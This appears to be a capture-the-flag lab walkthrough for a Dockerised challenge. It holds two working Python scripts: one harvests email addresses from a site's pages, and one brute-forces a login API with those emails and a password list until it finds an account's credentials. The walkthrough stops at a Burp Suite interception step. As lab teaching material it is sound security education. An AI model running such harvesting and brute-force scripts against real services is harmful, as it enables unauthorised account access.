image.png

Would you like to run this Docker container locally?

docker run -d -p 5055:3000 --name websockets --restart always joshbeck2024/ctf_websockets_challenge

For this challenge, we have a corporate website with email addresses scattered throughout it.

image.png

Here’s a script that extracts all email addresses from this series of webpages.

# Import the requests library to make HTTP requests (download web pages)
import requests

# Import re for regular expressions (used to find email patterns in text)
import re

# Import BeautifulSoup for parsing and navigating HTML content
from bs4 import BeautifulSoup

# Import urljoin to safely build full URLs from relative links
from urllib.parse import urljoin

def extract_emails(text):
    """
    This function takes a block of text and extracts any email addresses
    found inside it using a regular expression.
    """

    # Regular expression pattern that matches most email addresses
    email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}'

    # re.findall() returns all matches found in the text
    # set() removes duplicate email addresses
    return set(re.findall(email_pattern, text))

def scrape_emails():
    """
    This function visits a website, extracts emails from the main page,
    then follows links on that page and extracts emails from those pages too.
    """

    # The starting page we want to scrape
    base_url = "<http://sem2ctf.icsi.cyber:5055/index.html>"

    # Keep track of URLs we have already visited to avoid repeats
    visited_urls = set()

    # Store all discovered email addresses (unique values only)
    found_emails = set()

    # Create a session object for efficiency (reuses connections)
    session = requests.Session()

    print(f"I: Visiting main page: {base_url}")

    try:
        # Request the main page
        response = session.get(base_url, timeout=5)

        # Raise an exception if the request failed (404, 500, etc.)
        response.raise_for_status()

        # Parse the HTML content using BeautifulSoup
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract emails from all visible text on the main page
        found_emails.update(extract_emails(soup.get_text()))

        # List to store links found on the page
        links = []

        # Find all anchor (<a>) tags that contain an href attribute
        for a_tag in soup.find_all('a', href=True):
            href = a_tag['href']

            # Convert relative URLs into full absolute URLs
            full_url = urljoin(base_url, href)

            # Only follow valid HTTP links and avoid duplicates
            # This also skips things like mailto: or javascript: links
            if full_url.startswith('http') and full_url not in visited_urls:
                links.append(full_url)
                visited_urls.add(full_url)

        # Visit each discovered link once (one level deep)
        for link in links:
            # Avoid re-visiting the main page
            if link == base_url:
                continue

            print(f"I: Visiting link: {link}")

            try:
                # Request the linked page
                link_response = session.get(link, timeout=5)

                # Only process the page if the request was successful
                if link_response.status_code == 200:
                    link_soup = BeautifulSoup(link_response.text, 'html.parser')

                    # Extract emails from this page's text
                    found_emails.update(extract_emails(link_soup.get_text()))

            except Exception as e:
                # If a link fails (404, timeout, etc.), continue safely
                print(f"E: Failed to visit {link}: {e}")

    except Exception as e:
        # If the main page fails, stop the program
        print(f"C: Critical error accessing main page: {e}")
        return

    # Write all found email addresses to a file
    with open('email.txt', 'w') as f:
        for email in sorted(found_emails):
            f.write(email + '\\n')

    print(f"S: Scraped {len(found_emails)} unique emails. Saved to email.txt")

# This ensures the script only runs when executed directly,
# not when imported as a module
if __name__ == "__main__":
    scrape_emails()

A password list is provided on the front page to speed things up:

image.png

If we intercept a single manual login attempt using Burp Suite, we’ll see:

image.png

image.png

Because we now have our email.txt and pass.txt files, we can put together a textbook brute force:

# Import requests to send HTTP requests (used to talk to the API)
import requests

# Import sys (not used here, but commonly included for exiting or arguments)
import sys

def brute_force():
    """
    This function attempts to brute-force login credentials against
    a web API by trying combinations of usernames and passwords.
    """

    # The API endpoint we are attacking
    target_url = "<http://sem2ctf.icsi.cyber:5055/api/login>"

    # Load usernames (emails) from email.txt
    try:
        with open('email.txt', 'r') as f:
            # Read each line, remove whitespace, and ignore empty lines
            usernames = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        # Stop if the file does not exist
        print("E: email.txt not found.")
        return

    # Load passwords from pass.txt
    try:
        with open('pass.txt', 'r') as f:
            # Read each line, remove whitespace, and ignore empty lines
            passwords = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        # Stop if the file does not exist
        print("E: pass.txt not found.")
        return

    # Print basic info so the user knows what is happening
    print(f"I: Loaded {len(usernames)} usernames and {len(passwords)} passwords.")
    print(f"I: Target URL: {target_url}")

    # Create a session object to reuse the same connection (more efficient)
    session = requests.Session()

    # Loop through every username
    for username in usernames:
        # Loop through every password
        for password in passwords:
            # Optional debug output (commented out to reduce noise)
            # print(f"Trying {username}:{password}...", end='\\r')

            # Build the JSON payload sent to the API
            json_data = {
                'username': username,
                'password': password
            }

            try:
                # Send a POST request with JSON data
                response = session.post(
                    target_url,
                    json=json_data,
                    timeout=5
                )

                # Check for possible success
                # Many APIs return HTTP 200 on successful login
                if response.status_code == 200:
                    try:
                        # Try to parse the response as JSON
                        resp_json = response.json()

                        # Look for common success indicators
                        # - success flag
                        # - token value
                        # - the word "success" in the response
                        if (
                            resp_json.get('success') or
                            resp_json.get('token') or
                            'success' in response.text.lower()
                        ):
                            print(f"\\n[+] SUCCESS Found credentials: {username}:{password}")
                            print(f"Response: {response.text}")
                            return

                    except:
                        # If the response is not valid JSON,
                        # we fall back to checking the raw text
                        pass

                    # Fallback check in case JSON parsing failed
                    if "success" in response.text.lower():
                        print(f"\\n[+] SUCCESS Found credentials: {username}:{password}")
                        return

            except requests.RequestException as e:
                # If the request fails (timeout, connection error, etc.),
                # skip this attempt and continue
                # print(f"\\nE: Request failed for {username}:{password} - {e}")
                continue

    # If all combinations are tried with no success
    print("\\n[-] Finished brute force. No credentials found.")

# This ensures the function only runs if the script is executed directly
if __name__ == "__main__":
    brute_force()

This will kick out john@socketcorp.local’s credentials.

image.png

Now let’s intercept a login using these credentials in Burp Suite.

image.png